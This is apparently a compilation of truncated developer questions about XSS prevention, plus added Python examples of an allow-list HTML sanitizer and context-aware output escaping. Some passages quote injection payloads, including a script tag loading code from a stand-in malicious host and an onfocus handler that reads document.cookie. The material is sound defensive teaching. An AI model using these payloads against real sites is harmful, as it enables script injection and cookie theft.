Does anyone know whether a DOM Node of type Text is guaranteed not to be interpreted as HTML by the browser?
More details follow.
Background
I'm building a simple web comment system for a friend, and I've been thinking about XSS attacks. I don't think filtering or escaping HTML tags is a very elegant solution--it's too easy to come up w...
Hi,
I am trying to create a website where I host my data on google spreadsheets, and show data to the user in his browser using dojo.
However, I am getting the error
"Access to restricted URI denied" code: "1012"
when the browser encounters:
var stateStore = new dojox.data.CsvStore(
{url: "http://spreadsheets.google.com/pub?key=p0jvMl...
I'm writing a Java class which would be invoked by a servlet filter and which checks for injection attack attempts and XSS for a Java web application based on Struts. The InjectionAttackChecker class uses regex & the java.util.regex.Pattern class to validate the input against the patterns specified in the regex.
With that said, I have following...
I have some PageMethods (static methods in a page marked with <WebMethod>) defined on some pages and call them using an ajax call. This POST to the server apparently doesn't trigger the ASP.NET code that would raise HttpRequestValidationException if the data sent is deemed possible XSS, so I'd like to duplicate that checking code to run...
When outputting user input, do you only use htmlspecialchars() or are there are functions/actions/methods you also run? I'm looking for something that will also deal with XSS.
I'm wondering if I should write a function that escapes user input on output or just use htmlspecialchars(). I'm looking for the generic cases, not the specific c...
Which browsers do support HttpOnly cookies, and since which version?
Please see http://www.codinghorror.com/blog/archives/001167.html for a discussion of HttpOnly cookies and XSS-prevention.
...
Hi,
I have a Google calendar embedded on a webpage, with events related to activities the site is organizing. Some calendar events have links that redirect the user to a page, within the same website, which has more information and the option to enroll in the event.
The problem however, is that since the end of last month, Google impos...
I have a form that is accepting URLs from users in PHP.
What characters should I allow or disallow? Currently I use
$input= preg_replace("/[^a-zA-Z0-9-\?\:#.()\,\/\&\'\\"]/", "", $string);
$input=substr($input,0,255);
So, it's trimmed to 255 chars and only can include letters, numbers, and ? - _ : # ( ) , & ' " /
Anything I should b...
Hello, I need to implement a simple and efficient XSS filter in C++ for CppCMS. I can't use existing high-quality filters
written in PHP because it is a high-performance framework that uses C++.
The basic idea is to provide a filter that has a white list of HTML tags and a white
list of options for these tags. For example, typical H...
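Both of the two questions above (the PHP form that accepts URLs, and the white-list HTML filter for CppCMS) come down to the same decision: parse the input and allow only what you recognise, rather than deleting characters you dislike. The character allow-list in the PHP question, for instance, passes javascript:alert(1) unchanged, because every character in it is on the list. The following is an added example written for this page, not code from either question or from CppCMS; it is in Python so that it runs anywhere, but the structure (a URL parser with a scheme allow-list, and a tag/attribute allow-list rebuilt from parser tokens) is the same one you would write in C++ or PHP. The allowed tags, the 255-character limit and the "absolute http(s) links only" rule are assumptions chosen for the demonstration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Assumption for this example: user links must be absolute http(s) URLs.
ALLOWED_SCHEMES = {"http", "https"}
MAX_URL_LEN = 255  # same limit as the PHP question uses


def validate_url(raw):
    """Return a normalised http(s) URL, or None if the input must be rejected.

    Parsing instead of character filtering is what makes javascript:,
    data: and vbscript: links impossible, whatever characters they use."""
    if raw is None or len(raw) > MAX_URL_LEN:
        return None
    # Browsers ignore surrounding whitespace and embedded tab/CR/LF when
    # resolving a URL, so remove them before deciding what the scheme is.
    cleaned = "".join(ch for ch in raw.strip() if ch not in "\t\r\n")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in cleaned):
        return None
    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. malformed IPv6 host
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return urlunsplit(parts)


# Assumed allow-list for a comment-style subset: tag -> attributes permitted on it.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "ul": set(), "ol": set(), "li": set(), "blockquote": set(), "code": set(),
    "a": {"href", "title"},
}
VOID_TAGS = {"br"}


class WhitelistFilter(HTMLParser):
    """Rebuilds the fragment from parsed tokens, keeping only allowed tags and
    attributes. Text is re-escaped on output, so the result never contains
    anything the parser did not explicitly recognise and approve."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []  # emitted tags still open, so the output stays balanced

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text content is still kept as text
        kept = []
        for name, value in attrs:  # names and tags arrive lower-cased
            if name not in ALLOWED_TAGS[tag]:
                continue  # onclick, style, onerror ... never reach the output
            if name == "href":
                # Entity-encoded values (&#106;avascript:) are already decoded
                # by the parser at this point, so the scheme check sees them.
                value = validate_url(value)
                if value is None:
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in self.stack:
            while self.stack:  # also close anything left open inside it
                t = self.stack.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        # <script> and <style> bodies arrive here as data and are escaped too.
        self.out.append(escape(data, quote=False))

    def result(self):
        while self.stack:
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize_html(fragment):
    f = WhitelistFilter()
    f.feed(fragment)
    f.close()
    return f.result()
```

Two properties of this shape are worth keeping whatever language you port it to: the output is generated only from tokens the parser produced, never by copying input bytes through, and the href check runs on the decoded attribute value, so entity or case tricks in the scheme are seen for what they are.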
At the moment, I apply a 'throw everything at the wall and see what sticks' method of stopping the aforementioned issues. Below is the function I have cobbled together:
function madSafety($string)
{
$string = mysql_real_escape_string($string);
$string = stripslashes($string);
$string = strip_tags($string);
return $string;
}
However,...
We've been discussing a client-only solution in JavaScript that provides means for a site visitor to annotate a page for printing, and its exploitability in terms of XSS or similar attack vectors.
Rationale: There's a potentially long process choosing what data to display. In order to document the steps taken, a textarea (without ...
With forms I've always used
<form method="post" action="<?php echo strip_tags($_SERVER['REQUEST_URI']); ?>">
To get my forms to submit to themselves.
I use strip_tags() in case someone links to:
http://www.mysite.com/page-with-form.php?bla="><script src="http://www.nasty.com/super-nasty.js"></script><a href="#
Hav...
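The madSafety() function a few posts up and the strip_tags() form action here share one assumption: that removing tags from a string makes it safe to print anywhere. Inside an attribute value that is not true, because the characters that end an attribute are the quote and the closing angle bracket, not a tag. The following is an added example written for this page (not the posters' code): it renders the form action both ways and then parses the result the way a browser would, checking whether the action attribute survived intact. strip_tags_like() is an approximation of PHP's strip_tags() written for the demonstration, and the second payload is a constructed one that contains no tag at all.

```python
import html
import re
from html.parser import HTMLParser


def strip_tags_like(s):
    """Stand-in for PHP strip_tags(): drop <...> sequences and, like strip_tags,
    discard an unterminated tag through to the end of the string.
    (Assumption: close enough for this demonstration.)"""
    s = re.sub(r"<[^>]*>", "", s)
    return re.sub(r"<[^>]*$", "", s)


def action_via_strip_tags(uri):
    return f'<form method="post" action="{strip_tags_like(uri)}">'


def action_via_escaping(uri):
    # Attribute context: encode & < > " ' so the value cannot end the attribute
    return f'<form method="post" action="{html.escape(uri, quote=True)}">'


class TagRecorder(HTMLParser):
    """Records every tag a browser-like parser sees, with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def attribute_intact(markup, expected_action):
    """True only if the markup parses as exactly one <form> whose attributes
    are method and action, with action equal to the original input."""
    p = TagRecorder()
    p.feed(markup)
    p.close()
    return p.tags == [("form", {"method": "post", "action": expected_action})]


# Sample request URIs. The first is the payload from the post; the second is a
# constructed one with no tag in it, so tag stripping leaves it untouched.
TAG_PAYLOAD = ('/page-with-form.php?bla="><script src="http://www.nasty.com/'
               'super-nasty.js"></script><a href="#')
ATTR_PAYLOAD = '/page-with-form.php?bla=" autofocus onfocus="alert(document.cookie)'


def compare(uri):
    """Returns (intact_after_strip_tags, intact_after_escaping) for one URI."""
    return (attribute_intact(action_via_strip_tags(uri), uri),
            attribute_intact(action_via_escaping(uri), uri))
```

For the post's payload, stripping leaves `/page-with-form.php?bla=">`, so the attribute and the form tag still close early; for the tag-free payload the stripper changes nothing and the parser ends up with autofocus and onfocus attributes on the form. With html.escape(..., quote=True) the parser decodes the value back to exactly the input in both cases. The same reasoning applies to madSafety(): mysql_real_escape_string() is for a SQL string literal, strip_tags() for HTML text content, and neither is an encoder for the context the value is finally printed into.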
Is it necessary to filter/escape unsafe variables in <title> or other tags in <head> to prevent XSS?
...
Where in the following C# codebehind is the potential for XSS?
// Get data based on key names
for (int i = 0; i < m_dataKeyNames.Length; i++)
{
data[i] = (string)DataBinder.Eval(container.DataItem, m_dataKeyNames[i]);
}
Can this be fixed? Thanks.
...
I've been struggling with a problem for a few hours now, and I would appreciate either some help in accomplishing my goal, or confirmation that what I'm trying to do is in fact impossible.
I have a webapp that takes the selected text (document.getSelection()) as input, from an arbitrary webpage. While it would be possible to use a bookm...
I recently had a security audit run against one of the sites I work on. This was done with the Acunetix Web Vulnerability Scanner. This came back with a bunch of results that I'm sorting through.
A lot of hits on XSS came up, but I'm not sure if they are false positives or not.
Code such as:
if(isset($_GET['variableNameX']))
$var_...
In my ASP web page I am displaying SSN number
" name ="txtSSNID" size ="20">
The Fortify Developer tool detects this as an error. How can I fix this issue?
I need to display the SSN number, but it should not be caught while testing in the Fortify developer tool for security violations.
...
I realise there are several rich text editors for jQuery but I cannot find any that have an associated class that does the filtering and cleaning required to accept the input into a database.
Does such a class exist?
I am particularly interested for a PHP library, but .NET would be interesting too.
...
What is the recommended way to escape HTML to prevent XSS vulnerabilities in Rails apps?
Should you allow the user to put any text into the database but escape it when displaying it? Should you add before_save filters to escape the input?
...
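The PHP question above about htmlspecialchars() and this Rails one are really the same question: where does the escaping belong? The following is an added example written for this page (not from either question, and not Rails' own helpers): it stores a record raw, escapes at output with an encoder chosen by context, and contrasts that with a before_save-style filter that escapes on input. The record is constructed for the demonstration.

```python
import html
import json

# Constructed sample record, exactly as the user submitted it (stored raw).
RAW = {
    "name": 'Tom & Jerry </title><script>alert(1)</script>',
    "bio": 'O\'Neil says "hi" onmouseover="alert(1)',
}


def escape_on_input(record):
    """What a before_save filter does: HTML-escape every field before storing
    it, without knowing where the value will later be used."""
    return {k: html.escape(v, quote=True) for k, v in record.items()}


# Output-time encoders, one per context the value is placed into.
def for_html_text(s):
    return html.escape(s, quote=False)  # element content and <title>: & < >


def for_html_attr(s):
    return html.escape(s, quote=True)   # quoted attribute value: also " and '


def render_page(record):
    """HTML view: encode at the point of output, by context. The <title> case
    matters because a literal </title> would end the element."""
    return (
        f"<title>{for_html_text(record['name'])}</title>"
        f"<h1>{for_html_text(record['name'])}</h1>"
        f"<input name=\"bio\" value=\"{for_html_attr(record['bio'])}\">"
    )


def render_api(record):
    """JSON view: a different context with its own encoding (json.dumps).
    HTML entities do not belong here."""
    return json.dumps(record)


def api_roundtrip(record):
    """What a JSON client receives after parsing the API response."""
    return json.loads(render_api(record))


def displayed(text_fragment):
    """What a browser shows for an HTML text fragment: it decodes entities once."""
    return html.unescape(text_fragment)
```

With the raw record, render_page() contains no live markup and the API returns the user's text unchanged. With the input-escaped record, the API hands clients `Tom &amp; Jerry`, and the HTML view escapes the already-escaped value again, so the browser shows `&amp;` in the name. Escaping once, at output, with the encoder for that output, avoids both problems.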
Hi guys.
I developed a web application that permits my users to manage some aspects of a web site dynamically (yes, some kind of CMS) in a LAMP environment (Debian, Apache, PHP, MySQL).
Well, for example, they create a news item in their private area on my server, then it is published on their website via a cURL request (or by AJAX).
The n...